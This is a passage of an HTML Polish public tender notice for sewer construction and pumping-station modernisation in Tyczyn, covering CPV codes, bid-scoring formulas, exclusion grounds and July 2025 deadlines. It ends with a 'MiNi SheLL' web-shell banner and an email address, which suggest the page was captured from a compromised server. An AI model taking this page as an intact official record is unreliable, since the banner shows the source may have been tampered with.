wzoru:<br/>R = (Roferty-36 )/(Rmax-36 )*35 pkt,<br/>gdzie: R oznacza ilość punktów jakie otrzyma badana ofert<br/>Roferty oznacza wartość okresu gwarancji i rękojmi podaną w badanej ofercie, Rmax najwyższą wartość okresu gwarancji i rękojmi zaoferowaną w postępowaniu.<br/><br/>3)	Zatrudnienie osób defaworyzowanych „DF”:<br/><br/>Zamawiający przyzna – 5 pkt za zadeklarowanie skierowania do realizacji przedmiotu zamówienia osoby z katalogu tzw. „osób defaworyzowanych” wymienionych w art. 94 ust. 1 pkt 1), 2), 3), 7) i 9) ustawy Pzp przez okres co najmniej 3 miesięcy. Kryterium będzie weryfikowane na podstawie informacji zawartych w Formularz oferty.<br/>W przypadku braku zadeklarowania realizacji usługi przez osoby defarozyzowane z katalogu osób wymienionego powyżej, Wykonawca otrzyma w tym kryterium 0 pkt.<br/><br/>4.	Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który spełni wszystkie postawione<br/>w niniejszej SWZ warunki udziału w postępowaniu oraz uzyska łącznie największą liczbę punktów (P) stanowiących sumę punktów przyznanych w ramach każdego z podanych kryteriów, wyliczoną zgodnie z poniższym wzorem:<br/>P = C + GR + DF<br/>gdzie:	P – łączna liczba punktów<br/>C - liczba punktów przyznana ofercie ocenianej w kryterium Cena<br/>GR - liczba punktów przyznana ofercie ocenianej w kryterium Okres gwarancji i rękojmi<br/>DF – liczba punktów przyznana ofercie ocenianej w kryterium Zatrudnienie osób defaworyzowanych</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres Gwarancji i Rękojmi „GR”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osób defaworyzowanych „DF”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.3.	CZĘŚĆ 3: ROZBUDOWA SIECI KANALIZACJI SANITARNEJ W MIEJSCOWOŚCI KIELNAROWA W GMINIE TYCZYN<br/>Zakres prac obejmuje:<br/>o	budowę kolektorów kanalizacji sanitarnej grawitacyjnej PVC-U SN 8 o średnicy 200mm i długości 2519m wraz ze studzienkami rewizyjnymi z tworzyw sztucznych 425mm oraz betonowymi 1000mm.<br/>o	Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1C do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111240-2 - Roboty w zakresie odwadniania gruntu</p> <p class="mb-0">45232410-9 - Roboty w zakresie kanalizacji ściekowej</p> <p class="mb-0">45232440-8 - Roboty budowlane w zakresie budowy rurociągów do odprowadzania ścieków</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45231100-6 - Ogólne roboty budowlane związane z budową rurociągów</p> <p class="mb-0">45243600-8 - Roboty budowlane w zakresie ścianek szczelnych</p> <p class="mb-0">45232423-3 - Roboty budowlane w zakresie przepompowni ścieków</p> <p class="mb-0">45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45232150-8 - Roboty w zakresie rurociągów do przesyłu wody</p> <p class="mb-0">45232152-2 - Roboty budowlane w zakresie przepompowni</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający wybierze ofertę najkorzystniejszą spośród ofert nie odrzuconych wyłącznie na podstawie poniższych kryteriów oceny ofert.<br/>2.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert w każdej części zamówienia:<br/>1)	Cena (koszt) „C” – waga kryterium 60%=60 pkt<br/>2)	Okres Gwarancji i Rękojmi „GR” – waga kryterium 35 %= 35 pkt<br/>3)	Zatrudnienie osób defaworyzowanych „DF” – waga kryterium 5%= 5 pkt<br/>3.	Zasady oceny ofert w poszczególnych kryteriach:<br/>1)	Kryterium Cena (koszt) „C”:<br/>Kryterium „Cena&#34; będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w Formularzu Oferty. Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>Zamawiający ofercie o najniższej cenie przyzna 60 punktów a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/>C=(Cmin / Coferta) * 60 pkt, gdzie:<br/>C oznacza ilość punktów jakie otrzyma badana oferta za kryterium „C”,<br/>Cmin oznacza najniższą cenę brutto wśród ofert niepodlegających odrzuceniu,<br/>Coferta oznacza cenę brutto badanej oferty.<br/><br/><br/>2)	Kryterium Okres Gwarancji i Rękojmi „GR”:<br/>Kryterium „Okres Gwarancji i Rękojmi” będzie rozpatrywane na podstawie długości terminu okresu gwarancji i rękojmi na wykonane roboty budowlane i zastosowane urządzenia i materiały będące przedmiotem zamówienia w tym wbudowane wyroby i urządzenia, zadeklarowanego przez Wykonawcę w Formularzu oferty.<br/>Minimalny wymagany okres gwarancji i rękojmi wynosi 36 miesięcy, maksymalny 60 miesięcy. Przy zaoferowaniu okresu 36 miesięcy Wykonawcy zostanie przyznane 0 pkt. Wykonawca może zaoferować okres w pełnych miesiącach, tj.: 36,37,38, ……60 miesięcy. Jeżeli Wykonawca zaproponuje okres gwarancji i rękojmi dłuższy niż 60 miesięcy to do oceny ofert zostanie przyjęty okres 60 miesięcy, natomiast w umowie zostanie uwzględniony okres gwarancji i rękojmi podany przez Wykonawcę w ofercie. W przypadku gdy Wykonawca zaoferuje okres gwarancji i rękojmi krótszy niż 36 miesięcy lub żadnego to do oceny ofert zostanie przyjęty okres 36 miesięcy i taki zostanie wpisany w umowie z Wykonawcą.<br/>W tym kryterium można uzyskać maksymalnie 35 pkt. Zamawiający ofercie z okresem gwarancji i rękojmi 60 miesięcy przyzna 35 pkt a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/>R = (Roferty-36 )/(Rmax-36 )*35 pkt,<br/>gdzie: R oznacza ilość punktów jakie otrzyma badana ofert<br/>Roferty oznacza wartość okresu gwarancji i rękojmi podaną w badanej ofercie, Rmax najwyższą wartość okresu gwarancji i rękojmi zaoferowaną w postępowaniu.<br/><br/>3)	Zatrudnienie osób defaworyzowanych „DF”:<br/><br/>Zamawiający przyzna – 5 pkt za zadeklarowanie skierowania do realizacji przedmiotu zamówienia osoby z katalogu tzw. „osób defaworyzowanych” wymienionych w art. 94 ust. 1 pkt 1), 2), 3), 7) i 9) ustawy Pzp przez okres co najmniej 3 miesięcy. Kryterium będzie weryfikowane na podstawie informacji zawartych w Formularz oferty.<br/>W przypadku braku zadeklarowania realizacji usługi przez osoby defarozyzowane z katalogu osób wymienionego powyżej, Wykonawca otrzyma w tym kryterium 0 pkt.<br/><br/>4.	Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który spełni wszystkie postawione<br/>w niniejszej SWZ warunki udziału w postępowaniu oraz uzyska łącznie największą liczbę punktów (P) stanowiących sumę punktów przyznanych w ramach każdego z podanych kryteriów, wyliczoną zgodnie z poniższym wzorem:<br/>P = C + GR + DF<br/>gdzie:	P – łączna liczba punktów<br/>C - liczba punktów przyznana ofercie ocenianej w kryterium Cena<br/>GR - liczba punktów przyznana ofercie ocenianej w kryterium Okres gwarancji i rękojmi<br/>DF – liczba punktów przyznana ofercie ocenianej w kryterium Zatrudnienie osób defaworyzowanych</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres Gwarancji i Rękojmi „GR”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osób defaworyzowanych „DF”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.4.	CZĘŚĆ 4: MODERNIZACJA GŁÓWNEJ PRZEPOMPOWNI ŚCIEKÓW TYCZYN, UL. LAUROWA<br/>Zakres prac obejmuje:<br/>o	kompleksową wymianę istniejącej pompowni ścieków wraz uzbrojeniem towarzyszącym<br/>o	Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1D do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111240-2 - Roboty w zakresie odwadniania gruntu</p> <p class="mb-0">45232410-9 - Roboty w zakresie kanalizacji ściekowej</p> <p class="mb-0">45232440-8 - Roboty budowlane w zakresie budowy rurociągów do odprowadzania ścieków</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45231100-6 - Ogólne roboty budowlane związane z budową rurociągów</p> <p class="mb-0">45243600-8 - Roboty budowlane w zakresie ścianek szczelnych</p> <p class="mb-0">45232423-3 - Roboty budowlane w zakresie przepompowni ścieków</p> <p class="mb-0">45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45232150-8 - Roboty w zakresie rurociągów do przesyłu wody</p> <p class="mb-0">45232152-2 - Roboty budowlane w zakresie przepompowni</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający wybierze ofertę najkorzystniejszą spośród ofert nie odrzuconych wyłącznie na podstawie poniższych kryteriów oceny ofert.<br/>2.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert w każdej części zamówienia:<br/>1)	Cena (koszt) „C” – waga kryterium 60%=60 pkt<br/>2)	Okres Gwarancji i Rękojmi „GR” – waga kryterium 35 %= 35 pkt<br/>3)	Zatrudnienie osób defaworyzowanych „DF” – waga kryterium 5%= 5 pkt<br/>3.	Zasady oceny ofert w poszczególnych kryteriach:<br/>1)	Kryterium Cena (koszt) „C”:<br/>Kryterium „Cena&#34; będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w Formularzu Oferty. Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>Zamawiający ofercie o najniższej cenie przyzna 60 punktów a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/>C=(Cmin / Coferta) * 60 pkt, gdzie:<br/>C oznacza ilość punktów jakie otrzyma badana oferta za kryterium „C”,<br/>Cmin oznacza najniższą cenę brutto wśród ofert niepodlegających odrzuceniu,<br/>Coferta oznacza cenę brutto badanej oferty.<br/><br/><br/>2)	Kryterium Okres Gwarancji i Rękojmi „GR”:<br/>Kryterium „Okres Gwarancji i Rękojmi” będzie rozpatrywane na podstawie długości terminu okresu gwarancji i rękojmi na wykonane roboty budowlane i zastosowane urządzenia i materiały będące przedmiotem zamówienia w tym wbudowane wyroby i urządzenia, zadeklarowanego przez Wykonawcę w Formularzu oferty.<br/>Minimalny wymagany okres gwarancji i rękojmi wynosi 36 miesięcy, maksymalny 60 miesięcy. Przy zaoferowaniu okresu 36 miesięcy Wykonawcy zostanie przyznane 0 pkt. Wykonawca może zaoferować okres w pełnych miesiącach, tj.: 36,37,38, ……60 miesięcy. Jeżeli Wykonawca zaproponuje okres gwarancji i rękojmi dłuższy niż 60 miesięcy to do oceny ofert zostanie przyjęty okres 60 miesięcy, natomiast w umowie zostanie uwzględniony okres gwarancji i rękojmi podany przez Wykonawcę w ofercie. W przypadku gdy Wykonawca zaoferuje okres gwarancji i rękojmi krótszy niż 36 miesięcy lub żadnego to do oceny ofert zostanie przyjęty okres 36 miesięcy i taki zostanie wpisany w umowie z Wykonawcą.<br/>W tym kryterium można uzyskać maksymalnie 35 pkt. Zamawiający ofercie z okresem gwarancji i rękojmi 60 miesięcy przyzna 35 pkt a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/>R = (Roferty-36 )/(Rmax-36 )*35 pkt,<br/>gdzie: R oznacza ilość punktów jakie otrzyma badana ofert<br/>Roferty oznacza wartość okresu gwarancji i rękojmi podaną w badanej ofercie, Rmax najwyższą wartość okresu gwarancji i rękojmi zaoferowaną w postępowaniu.<br/><br/>3)	Zatrudnienie osób defaworyzowanych „DF”:<br/><br/>Zamawiający przyzna – 5 pkt za zadeklarowanie skierowania do realizacji przedmiotu zamówienia osoby z katalogu tzw. „osób defaworyzowanych” wymienionych w art. 94 ust. 1 pkt 1), 2), 3), 7) i 9) ustawy Pzp przez okres co najmniej 3 miesięcy. Kryterium będzie weryfikowane na podstawie informacji zawartych w Formularz oferty.<br/>W przypadku braku zadeklarowania realizacji usługi przez osoby defarozyzowane z katalogu osób wymienionego powyżej, Wykonawca otrzyma w tym kryterium 0 pkt.<br/><br/>4.	Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który spełni wszystkie postawione<br/>w niniejszej SWZ warunki udziału w postępowaniu oraz uzyska łącznie największą liczbę punktów (P) stanowiących sumę punktów przyznanych w ramach każdego z podanych kryteriów, wyliczoną zgodnie z poniższym wzorem:<br/>P = C + GR + DF<br/>gdzie:	P – łączna liczba punktów<br/>C - liczba punktów przyznana ofercie ocenianej w kryterium Cena<br/>GR - liczba punktów przyznana ofercie ocenianej w kryterium Okres gwarancji i rękojmi<br/>DF – liczba punktów przyznana ofercie ocenianej w kryterium Zatrudnienie osób defaworyzowanych</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres Gwarancji i Rękojmi „GR”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osób defaworyzowanych „DF”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, zgodnie z załącznikiem nr 5 do SWZ o których mowa w: <br/>art. 108 ust. 1 pkt 1 ustawy Pzp,<br/>art. 108 ust. 1 pkt 2 ustawy Pzp,<br/>art. 108 ust. 1 pkt 3 ustawy Pzp, <br/>art. 108 ust. 1 pkt 4 ustawy Pzp, <br/>art. 108 ust. 1 pkt 5 ustawy Pzp, <br/>art. 108 ust. 1 pkt 6 ustawy Pzp, <br/>art. 109 ust. 1 pkt 2 ustawy Pzp<br/> – Załącznik nr 5 do SWZ;<br/>2)	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">brak</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> brak <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zamawiający nie posługuje się interaktywnym Formularzem Oferty przewidzianym przez Platformę e-Zamówienia. Ofertę składa się na Formularzu Ofertowym - zgodnie z załącznikiem nr 2 do SWZ wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1)	oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ;<br/>2)	zobowiązanie innego podmiotu, o którym mowa w Rozdziale XI ust. 3 SWZ (jeżeli dotyczy);<br/>3)	dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli dotyczy); <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania<br/>i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. Pełnomocnictwo składane jest pod rygorem nieważność w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Dopuszcza się także złożenie elektronicznej kopii pełnomocnictwa sporządzonego uprzednio w formie pisemnej w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym bądź też opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy <br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania, wymienione w rozdziale X ust. 4 pkt 1) i 2), składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z projektowanymi postanowieniami umownymi stanowiącymi załącznik nr 4 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-28 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-28 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-26</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com